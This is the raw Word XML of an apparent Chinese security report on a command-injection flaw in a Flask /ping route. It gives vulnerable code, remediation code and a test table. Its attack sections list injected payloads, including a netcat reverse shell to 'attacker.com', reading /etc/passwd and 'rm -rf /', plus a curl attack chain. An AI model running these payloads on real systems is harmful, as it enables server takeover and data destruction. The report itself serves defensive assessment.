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CC0000"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>命令执行漏洞报告</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="CC000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报告日期：2026-07-13</w:t>
        <w:br/>
        <w:t>测试范围：/ping 路由命令注入漏洞</w:t>
        <w:br/>
        <w:t>提交哈希：9f6c10e</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>一、命令执行漏洞原理</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令执行漏洞（Command Injection）是指应用程序在构造系统命令时，将用户可控的输入直接拼接到命令字符串中，且未做任何过滤或转义，导致攻击者可以注入恶意命令并在服务器端执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令注入的常见拼接方式：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>shell=True 参数：Python subprocess 模块的 shell=True 会将命令字符串传递给系统 shell 解析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>f-string 拼接：直接将用户输入嵌入命令字符串，攻击者可插入分号、管道符、逻辑运算符等</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>无输入校验：不对用户输入做任何过滤，任意特殊字符均可传递到 shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>命令注入中常用的 shell 特殊字符：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;      # 命令分隔符  cmd1; cmd2</w:t>
        <w:br/>
        <w:t>|      # 管道符      cmd1 | cmd2</w:t>
        <w:br/>
        <w:t>&amp;&amp;     # 逻辑与      cmd1 &amp;&amp; cmd2</w:t>
        <w:br/>
        <w:t>||     # 逻辑或      cmd1 || cmd2</w:t>
        <w:br/>
        <w:t>`cmd`  # 命令替换    `cmd`</w:t>
        <w:br/>
        <w:t>$(cmd) # 命令替换    $(cmd)</w:t>
        <w:br/>
        <w:t>&gt;      # 重定向输出  cmd &gt; file</w:t>
        <w:br/>
        <w:t>&lt;      # 重定向输入  cmd &lt; file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>二、漏洞发现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.1 功能概述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Ping 网络诊断功能（/ping 路由）允许登录用户输入一个 IP 地址或域名，服务器使用系统 ping 命令进行网络连通性测试，并将原始输出返回给用户。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.2 漏洞代码定位</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>文件：app.py，/ping 路由（第 649-671 行）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@app.route("/ping", methods=["GET", "POST"])</w:t>
        <w:br/>
        <w:t>@login_required</w:t>
        <w:br/>
        <w:t>def ping():</w:t>
        <w:br/>
        <w:t xml:space="preserve">    result = None</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip = ""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    if request.method == "POST":</w:t>
        <w:br/>
        <w:t xml:space="preserve">        ip = request.form.get("ip", "")</w:t>
        <w:br/>
        <w:t xml:space="preserve">        if ip:</w:t>
        <w:br/>
        <w:t xml:space="preserve">            system = platform.system().lower()</w:t>
        <w:br/>
        <w:t xml:space="preserve">            if system == "windows":</w:t>
        <w:br/>
        <w:t xml:space="preserve">                cmd = f"ping -n 3 {ip}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">            else:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                cmd = f"ping -c 3 {ip}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">            try:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                output = subprocess.check_output(</w:t>
        <w:br/>
        <w:t xml:space="preserve">                    cmd, shell=True, stderr=subprocess.STDOUT, timeout=30</w:t>
        <w:br/>
        <w:t xml:space="preserve">                )</w:t>
        <w:br/>
        <w:t xml:space="preserve">                result = output.decode("utf-8", errors="replace")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            except subprocess.CalledProcessError as e:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                result = e.output.decode("utf-8", errors="replace")</w:t>
        <w:br/>
        <w:t xml:space="preserve">            except Exception as e:</w:t>
        <w:br/>
        <w:t xml:space="preserve">                result = f"执行失败: {str(e)}"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return render_template("ping.html", username=username, result=result, ip=ip)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>2.3 漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>该路由存在三个层次的安全问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>CE-01：shell=True 启用 shell 解释器（高危）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>subprocess.check_output() 的 shell=True 参数意味着命令字符串会传递给系统的/bin/sh（Linux/Mac）或 cmd.exe（Windows）进行解析。这会将用户输入中的特殊字符当作 shell 语法来执行，而不是普通参数。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>CE-02：f-string 字符串拼接（高危）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>f"ping -c 3 {ip}" 直接将用户输入的 ip 变量插入到命令字符串中，攻击者可以在 ip 中包含 shell 特殊字符来注入额外命令。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>CE-03：未对 ip 做任何过滤（高危）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>ip 参数没有经过任何校验或转义就被拼接到了系统命令中，攻击者可以随意构造 payload。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>三、攻击路径推演</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.1 命令注入 — 执行系统命令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攻击者登录系统</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>获取合法 session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构造注入 payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>输入: 8.8.8.8; whoami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提交 POST /ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ip=8.8.8.8; whoami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服务端拼接命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>ping -c 3 8.8.8.8; whoami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输出结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4819"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>whoami 命令的执行结果返回给攻击者</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t>实际注入效果：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用户输入</w:t>
        <w:br/>
        <w:t>ip = "8.8.8.8; whoami"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 拼接后的命令</w:t>
        <w:br/>
        <w:t>ping -c 3 8.8.8.8; whoami</w:t>
        <w:br/>
        <w:br/>
        <w:t># shell 按顺序执行两条命令：</w:t>
        <w:br/>
        <w:t># 1. ping -c 3 8.8.8.8  → 正常 ping 输出</w:t>
        <w:br/>
        <w:t># 2. whoami            → 返回当前用户名</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.2 高级攻击 payload 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执行效果</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>查看当前用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>查看用户 ID 和所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; ls -la /etc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>列出 /etc 目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; cat /etc/passwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>读取系统用户列表</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; pwd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>查看当前工作目录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; ifconfig</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>查看网络配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; nc -e /bin/sh attacker.com 4444</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反弹 shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; rm -rf / --no-preserve-root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>破坏系统⚠️</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8 || whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>逻辑或注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8 &amp;&amp; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>逻辑与注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>$(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令替换注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3118"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>`whoami`</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4535"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>反引号命令替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>3.3 完整攻击链路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Step 1: 登录获取 session</w:t>
        <w:br/>
        <w:t>curl -c cookies.txt -X POST http://localhost:5000/login \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "username=admin&amp;password=Admin123&amp;csrf_token=xxx"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 2: 命令注入 — 执行 whoami</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -X POST http://localhost:5000/ping \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "ip=127.0.0.1; whoami&amp;csrf_token=xxx"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 3: 返回结果中显示 "root" → 确认已获得 root shell</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 4: 反弹 shell</w:t>
        <w:br/>
        <w:t>curl -b cookies.txt -X POST http://localhost:5000/ping \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  -d "ip=127.0.0.1; nc -e /bin/sh attacker.com 4444&amp;csrf_token=xxx"</w:t>
        <w:br/>
        <w:br/>
        <w:t># Step 5: 攻击者机器监听</w:t>
        <w:br/>
        <w:t>nc -lvnp 4444  # 获得服务器 shell 控制权</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>四、漏洞危害评级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评级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攻击复杂度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>极低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>仅需浏览器或 curl，在输入框输入即可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2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>极低</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>无需任何特殊工具，普通 HTTP 请求即可</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>影响范围</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>极高</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>可执行任意系统命令，可能完全控制服务器</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>是否需要认证</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>需要</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>需要先登录（有 @login_required）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CVSS 3.x 评分</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>🔴 8.8 (高危)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3969"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>五、修复方案</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.1 方案一：不使用 shell=True（推荐）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>将命令和参数分开传递，避免经过 shell 解析。subprocess 在 shell=False（默认值）时，会直接执行程序而不经过 shell，用户输入中的特殊字符不会被解释为命令。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安全修复：不要使用 shell=True</w:t>
        <w:br/>
        <w:t>import subprocess</w:t>
        <w:br/>
        <w:br/>
        <w:t># 将命令和参数分开传递</w:t>
        <w:br/>
        <w:t>cmd = ["ping", "-c", "3", ip]</w:t>
        <w:br/>
        <w:t>output = subprocess.check_output(cmd, stderr=subprocess.STDOUT, timeout=30)</w:t>
        <w:br/>
        <w:br/>
        <w:t># shell=False（默认）时：</w:t>
        <w:br/>
        <w:t># - "8.8.8.8; whoami" 被当作一个整体参数传给 ping</w:t>
        <w:br/>
        <w:t># - ping 会尝试 ping 一个叫 "8.8.8.8; whoami" 的主机</w:t>
        <w:br/>
        <w:t># - 不会执行 whoami 命令</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.2 方案二：必须使用 shell=True 时的防御</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>如果必须使用 shell=True，则需要对 ip 参数进行严格过滤：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方案2a：仅允许合法的 IP 地址和域名（白名单校验）</w:t>
        <w:br/>
        <w:t>import re</w:t>
        <w:br/>
        <w:br/>
        <w:t>def is_valid_ip_or_domain(value):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    """检查是否为合法的 IP 地址或域名"""</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # IPv4 地址：x.x.x.x</w:t>
        <w:br/>
        <w:t xml:space="preserve">    ip_pattern = r'^(\d{1,3}\.){3}\d{1,3}$'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    # 域名：example.com</w:t>
        <w:br/>
        <w:t xml:space="preserve">    domain_pattern = r'^[a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?(\.[a-zA-Z0-9]([a-zA-Z0-9-]*[a-zA-Z0-9])?)*$'</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return bool(re.match(ip_pattern, value)) or bool(re.match(domain_pattern, value))</w:t>
        <w:br/>
        <w:br/>
        <w:t>if not is_valid_ip_or_domain(ip):</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return "输入格式不合法"</w:t>
        <w:br/>
        <w:br/>
        <w:t># 方案2b：转义 shell 特殊字符</w:t>
        <w:br/>
        <w:t>from shlex import quote</w:t>
        <w:br/>
        <w:t>safe_ip = quote(ip)  # 将特殊字符转义为普通字符</w:t>
        <w:br/>
        <w:t>cmd = f"ping -c 3 {safe_ip}"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>5.3 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方案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优点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缺点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推荐度</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shell=False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>彻底杜绝注入，最简单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134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>⭐⭐⭐⭐⭐</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>白名单校验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>防御全面</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>可能误判合法输入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>⭐⭐⭐⭐</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>shlex.quote()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>保留 shell=True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>仅转义，不够彻底</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1134"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>⭐⭐⭐</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>六、测试验证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预期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实际</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="850"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>T-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>正常 ping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>返回 ping 结果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T-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>分号注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>两条命令都执行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T-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>管道注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8 | whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>管道执行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T-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>逻辑与注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>8.8.8.8 &amp;&amp; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>条件执行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T-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>逻辑或注入</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>127.0.0.1 || whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>条件执行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T-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>命令替换</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2268"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>$(whoami)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1984"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:t>替换执行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T-07</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1701"/>
